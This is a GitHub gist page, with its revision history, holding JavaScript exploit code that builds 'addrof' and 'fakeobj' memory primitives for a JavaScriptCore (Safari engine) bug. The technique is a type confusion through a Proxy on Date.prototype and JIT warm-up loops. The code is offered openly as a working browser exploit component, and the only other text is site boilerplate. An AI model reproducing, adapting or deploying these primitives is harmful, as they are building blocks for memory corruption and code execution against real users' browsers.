-
-
Save AmesianX/0b98882d28bb9b5c65633ac8e43706fe to your computer and use it in GitHub Desktop.
Revisions
-
physuru revised this gist
May 17, 2020 . 1 changed file with 0 additions and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,5 +1,4 @@ // addrof/fakeobj primitives for qwertyoruiop's jsc bug var wtf_hack = false, wtf_confuse = null, wtf_obj = {}, wtf_date = new Date(); wtf_date[1] = 1; Date.prototype.__proto__ = new Proxy(Date.prototype.__proto__, { -
Aug 26, 2019 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,5 +1,5 @@ // addrof/fakeobj primitives for qwertyoruiop's jsc bug if (typeof alert != "undefined") top["deubg"] = top["alert"]; var wtf_hack = false, wtf_confuse = null, wtf_obj = {}, wtf_date = new Date(); wtf_date[1] = 1; Date.prototype.__proto__ = new Proxy(Date.prototype.__proto__, { -
Aug 26, 2019 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,43 @@ // addrof/fakeobj primitives for qwertyoruiop's jsc bug if (typeof alert != "undefined") eval("top.debug = alert"); var wtf_hack = false, wtf_confuse = null, wtf_obj = {}, wtf_date = new Date(); wtf_date[1] = 1; Date.prototype.__proto__ = new Proxy(Date.prototype.__proto__, { has: function () { if (wtf_hack) { wtf_confuse[0] = wtf_obj; } } }); function addrof(what) { wtf_confuse = new Array(1), wtf_obj = what; wtf_confuse[0] = 13.37; var f64 = new Float64Array(2); function victim(oj, f64, doubleArray) { doubleArray[0]; var r = 5 in oj; f64[0] = doubleArray[0]; doubleArray[0] = f64[0]; return r; } for (var i = 0; i < 25000; i++) victim(wtf_date, f64, wtf_confuse); wtf_hack = true; victim(wtf_date, f64, wtf_confuse); wtf_hack = false; return f64[0]; } function fakeobj(addr) { wtf_confuse = new Array(1), wtf_obj = {}; wtf_confuse[0] = 13.37; function victim(oj, doubleArray) { doubleArray[0]; var r = 5 in oj; doubleArray[0] = addr; return r; } for (var i = 0; i < 25000; i++) victim(wtf_date, wtf_confuse); wtf_hack = true; victim(wtf_date, wtf_confuse); wtf_hack = false; return wtf_confuse[0]; }